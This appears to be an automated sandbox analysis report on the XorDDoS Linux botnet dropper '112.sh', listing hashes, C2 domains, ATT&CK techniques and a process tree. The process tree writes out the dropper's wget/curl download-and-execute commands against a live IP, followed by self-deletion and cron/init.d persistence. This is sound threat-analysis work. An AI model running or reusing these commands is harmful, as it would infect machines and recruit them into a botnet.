Analysis
-
max time kernel
149s -
max time network
147s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
22-12-2024 07:59
Static task
static1
Behavioral task
behavioral1
Sample
112.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
112.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
112.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
112.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
112.sh
-
Size
318B
-
MD5
0368897400a135549c0a2d9d83d384cc
-
SHA1
29c933b2a8dd201b4aaea73789664dda02c2fe75
-
SHA256
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4
-
SHA512
00216c30c5ab73b63821846febd159ac0be3c5a6658921ce9753c858ff2f83d698518c67283a9b2bea9da6067698b1302b6d84bf65ada476aba60bc35eedd758
Malware Config
Extracted
xorddos
api.markerbio.com:112
api.enoan2107.com:112
http://qq.com/lib.asp
-
crc_polynomial
CDB88320
Signatures
-
XorDDoS
Botnet and downloader malware targeting Linux-based operating systems and IoT devices.
-
XorDDoS payload 2 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_xorddos behavioral1/files/fstream-4.dat family_xorddos -
Xorddos family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1504 chmod 1636 chmod -
Deletes itself 64 IoCs
pid Process 1506 112 1516 wydvsoynqgbrm 1519 nkhvwc 1523 lshzldytuwhip 1527 cgdnymmm 1528 wycrhnyxtxkde 1533 hllqvczscdjksj 1534 lgurmcttfg 1537 tuhihpwufr 1542 aqdtxjoqd 1543 gjzluldfurlo 1549 tpuwkuhbmm 1550 rucllp 1553 nbomjidolfwc 1558 nwfbhxfcozabtj 1559 gvdvyrkib 1563 ynuvpx 1565 nfnwcsysu 1568 tpjxvgatft 1571 pvsnkmk 1574 jxoqkksf 1577 nzkgovgmbifick 1580 zcnjoxmzwaqh 1583 kmwxni 1588 bdonewup 1589 emzibkybwa 1595 awtpxzdykfligh 1596 yqgkcsgcfqkjty 1599 diaksfebhmrtx 1602 rvnnqcmsf 1605 cmwksfvynvkgaq 1608 jcaczntxajnev 1611 mihyeutmp 1614 zmdhpv 1619 pftbpbc 1620 yytdziyylj 1623 xvioqhctrrojso 1630 xqnvoyfcp 1631 wtbzvxysfmi 1632 odgitrciwzalwq 1635 bvaprvrsqoqi 1645 cslsvtcpkezi 1650 zvcrgd 1651 jtfemxxanfy 1656 ebgqkbwrnv 1657 yjmvcokptjxykt 1660 plvocv 1665 orcfdran 1666 yzjbdljwxm 1671 vqiauzahpbg 1672 ozpeqaaefx 1675 emmpijbcaar 1681 sugxzeduunx 1680 mzxdag 1686 gsqvcawea 1687 xgrrnqq 1690 tnpgkgujfz 1694 lesfuojwmn 1696 llhccwsvpnigtu 1699 pfuorhum 1702 paynomozzvbd 1709 tygiiodcdsi 1708 jzgdlvun 1711 iciwdjtfmkalsj -
Executes dropped EXE 64 IoCs
ioc pid Process /tmp/112 1505 112 /bin/mfnkzmtfdzkb 1510 mfnkzmtfdzkb /bin/wydvsoynqgbrm 1515 wydvsoynqgbrm /bin/nkhvwc 1518 nkhvwc /bin/lshzldytuwhip 1521 lshzldytuwhip /bin/cgdnymmm 1526 cgdnymmm /bin/wycrhnyxtxkde 1524 wycrhnyxtxkde /bin/hllqvczscdjksj 1530 hllqvczscdjksj /bin/lgurmcttfg 1532 lgurmcttfg /bin/tuhihpwufr 1536 tuhihpwufr /bin/aqdtxjoqd 1541 aqdtxjoqd /bin/gjzluldfurlo 1539 gjzluldfurlo /bin/rucllp 1546 rucllp /bin/tpuwkuhbmm 1548 tpuwkuhbmm /bin/nbomjidolfwc 1552 nbomjidolfwc /bin/nwfbhxfcozabtj 1555 nwfbhxfcozabtj /bin/gvdvyrkib 1557 gvdvyrkib /bin/ynuvpx 1561 ynuvpx /bin/nfnwcsysu 1564 nfnwcsysu /bin/tpjxvgatft 1567 tpjxvgatft /bin/pvsnkmk 1570 pvsnkmk /bin/jxoqkksf 1573 jxoqkksf /bin/nzkgovgmbifick 1576 nzkgovgmbifick /bin/zcnjoxmzwaqh 1579 zcnjoxmzwaqh /bin/kmwxni 1582 kmwxni /bin/bdonewup 1585 bdonewup /bin/emzibkybwa 1587 emzibkybwa /bin/yqgkcsgcfqkjty 1592 yqgkcsgcfqkjty /bin/awtpxzdykfligh 1594 awtpxzdykfligh /bin/diaksfebhmrtx 1598 diaksfebhmrtx /bin/rvnnqcmsf 1601 rvnnqcmsf /bin/cmwksfvynvkgaq 1604 cmwksfvynvkgaq /bin/jcaczntxajnev 1607 jcaczntxajnev /bin/mihyeutmp 1610 mihyeutmp /bin/zmdhpv 1613 zmdhpv /bin/pftbpbc 1618 pftbpbc /bin/yytdziyylj 1616 yytdziyylj /bin/xvioqhctrrojso 1622 xvioqhctrrojso /bin/wtbzvxysfmi 1627 wtbzvxysfmi /bin/xqnvoyfcp 1625 xqnvoyfcp /bin/odgitrciwzalwq 1629 odgitrciwzalwq /bin/bvaprvrsqoqi 1634 bvaprvrsqoqi /tmp/112s 1637 112s /bin/cslsvtcpkezi 1644 cslsvtcpkezi /bin/zvcrgd 1647 zvcrgd /bin/jtfemxxanfy 1649 jtfemxxanfy /bin/ebgqkbwrnv 1655 ebgqkbwrnv /bin/yjmvcokptjxykt 1653 yjmvcokptjxykt /bin/plvocv 1659 plvocv /bin/orcfdran 1662 orcfdran /bin/yzjbdljwxm 1664 yzjbdljwxm /bin/vqiauzahpbg 1670 vqiauzahpbg /bin/ozpeqaaefx 1668 ozpeqaaefx /bin/emmpijbcaar 1674 emmpijbcaar /bin/sugxzeduunx 1677 sugxzeduunx /bin/mzxdag 1679 mzxdag /bin/gsqvcawea 1683 gsqvcawea /bin/xgrrnqq 1685 xgrrnqq /bin/tnpgkgujfz 1689 tnpgkgujfz /bin/lesfuojwmn 1692 lesfuojwmn /bin/llhccwsvpnigtu 1695 llhccwsvpnigtu /bin/pfuorhum 1698 pfuorhum /bin/paynomozzvbd 1701 paynomozzvbd /bin/tygiiodcdsi 1704 tygiiodcdsi -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 114.114.114.114 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/cron.hourly/bkzdftmzknfm.sh mfnkzmtfdzkb -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp mfnkzmtfdzkb -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/bkzdftmzknfm mfnkzmtfdzkb -
Writes file to system bin folder 64 IoCs
description ioc Process File opened for modification /bin/mfnkzmtfdzkb 112 File opened for modification /bin/pvsnkmk mfnkzmtfdzkb File opened for modification /bin/cmwksfvynvkgaq mfnkzmtfdzkb File opened for modification /bin/awtpxzdykfligh mfnkzmtfdzkb File opened for modification /bin/jcaczntxajnev mfnkzmtfdzkb File opened for modification /bin/xqnvoyfcp mfnkzmtfdzkb File opened for modification /bin/vpsnwfx mfnkzmtfdzkb File opened for modification /bin/bkzdftmzknfm mfnkzmtfdzkb File opened for modification /bin/yjmvcokptjxykt mfnkzmtfdzkb File opened for modification /bin/vvgoxdbktzsxvs mfnkzmtfdzkb File opened for modification /bin/hllqvczscdjksj mfnkzmtfdzkb File opened for modification /bin/diaksfebhmrtx mfnkzmtfdzkb File opened for modification /bin/orcfdran mfnkzmtfdzkb File opened for modification /bin/vqiauzahpbg mfnkzmtfdzkb File opened for modification /bin/lesfuojwmn mfnkzmtfdzkb File opened for modification /bin/jzgdlvun mfnkzmtfdzkb File opened for modification /bin/crakqvmzoqhfl mfnkzmtfdzkb File opened for modification /bin/pdwhbrbpnl mfnkzmtfdzkb File opened for modification /bin/tpuwkuhbmm mfnkzmtfdzkb File opened for modification /bin/islaxexphyucj mfnkzmtfdzkb File opened for modification /bin/yfeuapyrpij mfnkzmtfdzkb File opened for modification /bin/dzlubgvzig mfnkzmtfdzkb File opened for modification /bin/pvymotenez mfnkzmtfdzkb File opened for modification /bin/tygiiodcdsi mfnkzmtfdzkb File opened for modification /bin/sgkrlbe mfnkzmtfdzkb File opened for modification /bin/bbkirvcctwq mfnkzmtfdzkb File opened for modification /bin/rucllp mfnkzmtfdzkb File opened for modification /bin/pftbpbc mfnkzmtfdzkb File opened for modification /bin/odgitrciwzalwq mfnkzmtfdzkb File opened for modification /bin/yrcjpo mfnkzmtfdzkb File opened for modification /bin/edyidut mfnkzmtfdzkb File opened for modification /bin/emmyshnirk mfnkzmtfdzkb File opened for modification /bin/cnjmuyzukqrqyd mfnkzmtfdzkb File opened for modification /bin/jhihasgud mfnkzmtfdzkb File opened for modification /bin/rvnnqcmsf mfnkzmtfdzkb File opened for modification /bin/bvaprvrsqoqi mfnkzmtfdzkb File opened for modification /bin/mzxdag mfnkzmtfdzkb File opened for modification /bin/llhccwsvpnigtu mfnkzmtfdzkb File opened for modification /bin/tislws mfnkzmtfdzkb File opened for modification /bin/hdprctzwc mfnkzmtfdzkb File opened for modification /bin/kmwxni mfnkzmtfdzkb File opened for modification /bin/zdwsuacbbmffll mfnkzmtfdzkb File opened for modification /bin/ujecvozd mfnkzmtfdzkb File opened for modification /bin/qokubokhnnxmo mfnkzmtfdzkb File opened for modification /bin/kjgldrbwjbzgd mfnkzmtfdzkb File opened for modification /bin/ynuvpx mfnkzmtfdzkb File opened for modification /bin/iciwdjtfmkalsj mfnkzmtfdzkb File opened for modification /bin/juiysowigk mfnkzmtfdzkb File opened for modification /bin/nfnwcsysu mfnkzmtfdzkb File opened for modification /bin/xvioqhctrrojso mfnkzmtfdzkb File opened for modification /bin/wycrhnyxtxkde mfnkzmtfdzkb File opened for modification /bin/skoqaiedavdm mfnkzmtfdzkb File opened for modification /bin/nytlhb mfnkzmtfdzkb File opened for modification /bin/cqicip mfnkzmtfdzkb File opened for modification /bin/nwfbhxfcozabtj mfnkzmtfdzkb File opened for modification /bin/jtfemxxanfy mfnkzmtfdzkb File opened for modification /bin/ebgqkbwrnv mfnkzmtfdzkb File opened for modification /bin/kaouysdrx mfnkzmtfdzkb File opened for modification /bin/bzdtiybxwpgcz mfnkzmtfdzkb File opened for modification /bin/ytmloprlq mfnkzmtfdzkb File opened for modification /bin/jynlxvqandvcu mfnkzmtfdzkb File opened for modification /bin/tpjxvgatft mfnkzmtfdzkb File opened for modification /bin/hgcfuesmokxic mfnkzmtfdzkb File opened for modification /bin/gikebyne mfnkzmtfdzkb -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp mfnkzmtfdzkb -
description ioc Process File opened for reading /proc/1110/fd mfnkzmtfdzkb File opened for reading /proc/1283/fd mfnkzmtfdzkb File opened for reading /proc/1498/fd mfnkzmtfdzkb File opened for reading /proc/491/fd mfnkzmtfdzkb File opened for reading /proc/1608/fd mfnkzmtfdzkb File opened for reading /proc/1565/fd mfnkzmtfdzkb File opened for reading /proc/1709/fd mfnkzmtfdzkb File opened for reading /proc/1803/fd mfnkzmtfdzkb File opened for reading /proc/1840/fd mfnkzmtfdzkb File opened for reading /proc/1135/fd mfnkzmtfdzkb File opened for reading /proc/1602/fd mfnkzmtfdzkb File opened for reading /proc/1861/fd mfnkzmtfdzkb File opened for reading /proc/1889/fd mfnkzmtfdzkb File opened for reading /proc/450/fd mfnkzmtfdzkb File opened for reading /proc/1507/fd mfnkzmtfdzkb File opened for reading /proc/1/fd mfnkzmtfdzkb File opened for reading /proc/1756/fd mfnkzmtfdzkb File opened for reading /proc/1026/fd mfnkzmtfdzkb File opened for reading /proc/1245/fd mfnkzmtfdzkb File opened for reading /proc/1632/fd mfnkzmtfdzkb File opened for reading /proc/1741/fd mfnkzmtfdzkb File opened for reading /proc/1866/fd mfnkzmtfdzkb File opened for reading /proc/1890/fd mfnkzmtfdzkb File opened for reading /proc/1759/fd mfnkzmtfdzkb File opened for reading /proc/1816/fd mfnkzmtfdzkb File opened for reading /proc/247/fd mfnkzmtfdzkb File opened for reading /proc/1686/fd mfnkzmtfdzkb File opened for reading /proc/1848/fd mfnkzmtfdzkb File opened for reading /proc/699/fd mfnkzmtfdzkb File opened for reading /proc/1096/fd mfnkzmtfdzkb File opened for reading /proc/1182/fd mfnkzmtfdzkb File opened for reading /proc/1563/fd mfnkzmtfdzkb File opened for reading /proc/1708/fd mfnkzmtfdzkb File opened for reading /proc/1777/fd mfnkzmtfdzkb File opened for reading /proc/1745/fd mfnkzmtfdzkb File opened for reading /proc/1106/fd mfnkzmtfdzkb File opened for reading /proc/1623/fd mfnkzmtfdzkb File opened for reading /proc/1771/fd mfnkzmtfdzkb File opened for reading /proc/1785/fd mfnkzmtfdzkb File opened for reading /proc/1151/fd mfnkzmtfdzkb File opened for reading /proc/950/fd mfnkzmtfdzkb File opened for reading /proc/1258/fd mfnkzmtfdzkb File opened for reading /proc/1550/fd mfnkzmtfdzkb File opened for reading /proc/1729/fd mfnkzmtfdzkb File opened for reading /proc/445/fd mfnkzmtfdzkb File opened for reading /proc/1571/fd mfnkzmtfdzkb File opened for reading /proc/1620/fd mfnkzmtfdzkb File opened for reading /proc/1873/fd mfnkzmtfdzkb File opened for reading /proc/1215/fd mfnkzmtfdzkb File opened for reading /proc/1711/fd mfnkzmtfdzkb File opened for reading /proc/1750/fd mfnkzmtfdzkb File opened for reading /proc/1798/fd mfnkzmtfdzkb File opened for reading /proc/1882/fd mfnkzmtfdzkb File opened for reading /proc/1278/fd mfnkzmtfdzkb File opened for reading /proc/1559/fd mfnkzmtfdzkb File opened for reading /proc/1675/fd mfnkzmtfdzkb File opened for reading /proc/1131/fd mfnkzmtfdzkb File opened for reading /proc/1574/fd mfnkzmtfdzkb File opened for reading /proc/1645/fd mfnkzmtfdzkb File opened for reading /proc/1657/fd mfnkzmtfdzkb File opened for reading /proc/486/fd mfnkzmtfdzkb File opened for reading /proc/546/fd mfnkzmtfdzkb File opened for reading /proc/1114/fd mfnkzmtfdzkb File opened for reading /proc/1141/fd mfnkzmtfdzkb -
Writes file to shm directory 3 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
description ioc Process File opened for modification /dev/shm/sem.absmuj 112s File opened for modification /dev/shm/sem.absmuj mfnkzmtfdzkb File opened for modification /dev/shm/sem.GJ6dMU mfnkzmtfdzkb -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/112 curl File opened for modification /tmp/112s wget File opened for modification /tmp/112s curl File opened for modification /tmp/112 wget
Processes
-
/tmp/112.sh/tmp/112.sh1⤵PID:1496
-
/usr/bin/wgetwget http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
PID:1497
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
PID:1501
-
-
/bin/chmodchmod +x 1122⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/112./1122⤵
- Deletes itself
- Executes dropped EXE
- Writes file to system bin folder
PID:1505
-
-
/usr/bin/wgetwget http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
PID:1507
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/chmodchmod +x 112s2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/112s./112s2⤵
- Executes dropped EXE
- Writes file to shm directory
PID:1637
-
-
/bin/rmrm -rf 112.sh2⤵PID:1639
-
-
/bin/rmrm -rf 1122⤵PID:1640
-
-
/bin/rmrm -rf 112s2⤵PID:1641
-
-
/bin/mfnkzmtfdzkb/bin/mfnkzmtfdzkb1⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Writes file to system bin folder
- Reads system network configuration
- Reads runtime system information
- Writes file to shm directory
PID:1510
-
/bin/wydvsoynqgbrm/bin/wydvsoynqgbrm -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1515
-
/bin/nkhvwc/bin/nkhvwc -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1518
-
/bin/lshzldytuwhip/bin/lshzldytuwhip -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1521
-
/bin/cgdnymmm/bin/cgdnymmm -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1526
-
/bin/wycrhnyxtxkde/bin/wycrhnyxtxkde -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1524
-
/bin/hllqvczscdjksj/bin/hllqvczscdjksj -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1530
-
/bin/lgurmcttfg/bin/lgurmcttfg -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1532
-
/bin/tuhihpwufr/bin/tuhihpwufr -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1536
-
/bin/aqdtxjoqd/bin/aqdtxjoqd -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1541
-
/bin/gjzluldfurlo/bin/gjzluldfurlo -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1539
-
/bin/rucllp/bin/rucllp -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1546
-
/bin/tpuwkuhbmm/bin/tpuwkuhbmm -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1548
-
/bin/nbomjidolfwc/bin/nbomjidolfwc -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1552
-
/bin/nwfbhxfcozabtj/bin/nwfbhxfcozabtj -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1555
-
/bin/gvdvyrkib/bin/gvdvyrkib -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1557
-
/bin/ynuvpx/bin/ynuvpx -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1561
-
/bin/nfnwcsysu/bin/nfnwcsysu -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1564
-
/bin/tpjxvgatft/bin/tpjxvgatft -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1567
-
/bin/pvsnkmk/bin/pvsnkmk -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1570
-
/bin/jxoqkksf/bin/jxoqkksf -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1573
-
/bin/nzkgovgmbifick/bin/nzkgovgmbifick -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1576
-
/bin/zcnjoxmzwaqh/bin/zcnjoxmzwaqh -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1579
-
/bin/kmwxni/bin/kmwxni -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1582
-
/bin/bdonewup/bin/bdonewup -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1585
-
/bin/emzibkybwa/bin/emzibkybwa -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1587
-
/bin/yqgkcsgcfqkjty/bin/yqgkcsgcfqkjty -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1592
-
/bin/awtpxzdykfligh/bin/awtpxzdykfligh -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1594
-
/bin/diaksfebhmrtx/bin/diaksfebhmrtx -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1598
-
/bin/rvnnqcmsf/bin/rvnnqcmsf -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1601
-
/bin/cmwksfvynvkgaq/bin/cmwksfvynvkgaq -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1604
-
/bin/jcaczntxajnev/bin/jcaczntxajnev -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1607
-
/bin/mihyeutmp/bin/mihyeutmp -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1610
-
/bin/zmdhpv/bin/zmdhpv -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1613
-
/bin/pftbpbc/bin/pftbpbc -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1618
-
/bin/yytdziyylj/bin/yytdziyylj -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1616
-
/bin/xvioqhctrrojso/bin/xvioqhctrrojso -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1622
-
/bin/wtbzvxysfmi/bin/wtbzvxysfmi -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1627
-
/bin/xqnvoyfcp/bin/xqnvoyfcp -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1625
-
/bin/odgitrciwzalwq/bin/odgitrciwzalwq -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1629
-
/bin/bvaprvrsqoqi/bin/bvaprvrsqoqi -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1634
-
/bin/cslsvtcpkezi/bin/cslsvtcpkezi -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1644
-
/bin/zvcrgd/bin/zvcrgd -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1647
-
/bin/jtfemxxanfy/bin/jtfemxxanfy -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1649
-
/bin/ebgqkbwrnv/bin/ebgqkbwrnv -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1655
-
/bin/yjmvcokptjxykt/bin/yjmvcokptjxykt -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1653
-
/bin/plvocv/bin/plvocv -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1659
-
/bin/orcfdran/bin/orcfdran -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1662
-
/bin/yzjbdljwxm/bin/yzjbdljwxm -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1664
-
/bin/vqiauzahpbg/bin/vqiauzahpbg -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1670
-
/bin/ozpeqaaefx/bin/ozpeqaaefx -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1668
-
/bin/emmpijbcaar/bin/emmpijbcaar -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1674
-
/bin/sugxzeduunx/bin/sugxzeduunx -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1677
-
/bin/mzxdag/bin/mzxdag -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1679
-
/bin/gsqvcawea/bin/gsqvcawea -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1683
-
/bin/xgrrnqq/bin/xgrrnqq -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1685
-
/bin/tnpgkgujfz/bin/tnpgkgujfz -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1689
-
/bin/lesfuojwmn/bin/lesfuojwmn -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1692
-
/bin/llhccwsvpnigtu/bin/llhccwsvpnigtu -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1695
-
/bin/pfuorhum/bin/pfuorhum -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1698
-
/bin/paynomozzvbd/bin/paynomozzvbd -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1701
-
/bin/tygiiodcdsi/bin/tygiiodcdsi -d 15111⤵
- Deletes itself
- Executes dropped EXE
PID:1704
-
/bin/jzgdlvun/bin/jzgdlvun -d 15111⤵
- Deletes itself
PID:1706
-
/bin/iciwdjtfmkalsj/bin/iciwdjtfmkalsj -d 15111⤵
- Deletes itself
PID:1710
-
/bin/gmylhgkshtvvoq/bin/gmylhgkshtvvoq -d 15111⤵PID:1713
-
/bin/kaouysdrx/bin/kaouysdrx -d 15111⤵PID:1716
-
/bin/bzdtiybxwpgcz/bin/bzdtiybxwpgcz -d 15111⤵PID:1719
-
/bin/msvhjltv/bin/msvhjltv -d 15111⤵PID:1721
-
/bin/islaxexphyucj/bin/islaxexphyucj -d 15111⤵PID:1725
-
/bin/egptou/bin/egptou -d 15111⤵PID:1728
-
/bin/minhryv/bin/minhryv -d 15111⤵PID:1731
-
/bin/tislws/bin/tislws -d 15111⤵PID:1734
-
/bin/crakqvmzoqhfl/bin/crakqvmzoqhfl -d 15111⤵PID:1737
-
/bin/bijjxqavnn/bin/bijjxqavnn -d 15111⤵PID:1739
-
/bin/yfeuapyrpij/bin/yfeuapyrpij -d 15111⤵PID:1743
-
/bin/vianpibmj/bin/vianpibmj -d 15111⤵PID:1746
-
/bin/vvgoxdbktzsxvs/bin/vvgoxdbktzsxvs -d 15111⤵PID:1749
-
/bin/ujecvozd/bin/ujecvozd -d 15111⤵PID:1752
-
/bin/nvzohkzffftfi/bin/nvzohkzffftfi -d 15111⤵PID:1754
-
/bin/pdwhbrbpnl/bin/pdwhbrbpnl -d 15111⤵PID:1758
-
/bin/sgkrlbe/bin/sgkrlbe -d 15111⤵PID:1761
-
/bin/cusovxwa/bin/cusovxwa -d 15111⤵PID:1764
-
/bin/bkosokare/bin/bkosokare -d 15111⤵PID:1766
-
/bin/groajwkdknhsre/bin/groajwkdknhsre -d 15111⤵PID:1770
-
/bin/fzhdczeoo/bin/fzhdczeoo -d 15111⤵PID:1773
-
/bin/caztea/bin/caztea -d 15111⤵PID:1776
-
/bin/zdwsuacbbmffll/bin/zdwsuacbbmffll -d 15111⤵PID:1781
-
/bin/biychsi/bin/biychsi -d 15111⤵PID:1784
-
/bin/yrcjpo/bin/yrcjpo -d 15111⤵PID:1779
-
/bin/ugdyqs/bin/ugdyqs -d 15111⤵PID:1788
-
/bin/csrymlaooeavj/bin/csrymlaooeavj -d 15111⤵PID:1791
-
/bin/hdprctzwc/bin/hdprctzwc -d 15111⤵PID:1794
-
/bin/skoqaiedavdm/bin/skoqaiedavdm -d 15111⤵PID:1796
-
/bin/edyidut/bin/edyidut -d 15111⤵PID:1800
-
/bin/dzlubgvzig/bin/dzlubgvzig -d 15111⤵PID:1802
-
/bin/twlvfpa/bin/twlvfpa -d 15111⤵PID:1806
-
/bin/mewukzuueq/bin/mewukzuueq -d 15111⤵PID:1809
-
/bin/ujxqusxlt/bin/ujxqusxlt -d 15111⤵PID:1814
-
/bin/ytmloprlq/bin/ytmloprlq -d 15111⤵PID:1812
-
/bin/yhtowlb/bin/yhtowlb -d 15111⤵PID:1820
-
/bin/xzdtlcofges/bin/xzdtlcofges -d 15111⤵PID:1818
-
/bin/caxxlblqkq/bin/caxxlblqkq -d 15111⤵PID:1826
-
/bin/pvymotenez/bin/pvymotenez -d 15111⤵PID:1824
-
/bin/sqsmgq/bin/sqsmgq -d 15111⤵PID:1830
-
/bin/jfofeavzgidg/bin/jfofeavzgidg -d 15111⤵PID:1833
-
/bin/hgcfuesmokxic/bin/hgcfuesmokxic -d 15111⤵PID:1836
-
/bin/uiktsphz/bin/uiktsphz -d 15111⤵PID:1839
-
/bin/emmyshnirk/bin/emmyshnirk -d 15111⤵PID:1844
-
/bin/ueleogydoxzxt/bin/ueleogydoxzxt -d 15111⤵PID:1846
-
/bin/huuoeywj/bin/huuoeywj -d 15111⤵PID:1842
-
/bin/nytlhb/bin/nytlhb -d 15111⤵PID:1851
-
/bin/vpsnwfx/bin/vpsnwfx -d 15111⤵PID:1854
-
/bin/qokubokhnnxmo/bin/qokubokhnnxmo -d 15111⤵PID:1857
-
/bin/gikebyne/bin/gikebyne -d 15111⤵PID:1859
-
/bin/juiysowigk/bin/juiysowigk -d 15111⤵PID:1863
-
/bin/cnjmuyzukqrqyd/bin/cnjmuyzukqrqyd -d 15111⤵PID:1865
-
/bin/fwzzym/bin/fwzzym -d 15111⤵PID:1871
-
/bin/bbkirvcctwq/bin/bbkirvcctwq -d 15111⤵PID:1869
-
/bin/kjgldrbwjbzgd/bin/kjgldrbwjbzgd -d 15111⤵PID:1875
-
/bin/kxsimcuxjic/bin/kxsimcuxjic -d 15111⤵PID:1880
-
/bin/slunpwglmw/bin/slunpwglmw -d 15111⤵PID:1878
-
/bin/jhihasgud/bin/jhihasgud -d 15111⤵PID:1886
-
/bin/jynlxvqandvcu/bin/jynlxvqandvcu -d 15111⤵PID:1884
-
/bin/wzrhhtlrr/bin/wzrhhtlrr -d 15111⤵PID:1888
-
/bin/epwwrmzmovg/bin/epwwrmzmovg -d 15111⤵PID:1893
-
/bin/cqicip/bin/cqicip -d 15111⤵PID:1896
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
549KB
MD519780849cc764ddbbb9de27fb91c9358
SHA1edb58e4d579a11047e0e28edceacb4ce1c7777f0
SHA256a342c6238fdfde156355a45f95d18e5dfd962584419069d2fe202d4b4a06e88a
SHA5120c41641a43f4a83fee41e73f87091366e4a1055739128f956050ed10f80a2c705dfd471ef457158c4f9321f74ea869f5b59f31c3dee678d2750bc9d1cf60e063
-
Filesize
16B
MD5076933ff9904d1110d896e2c525e39e5
SHA14188442577fa77f25820d9b2d01cc446e30684ac
SHA2564cbbd8ca5215b8d161aec181a74b694f4e24b001d5b081dc0030ed797a8973e0
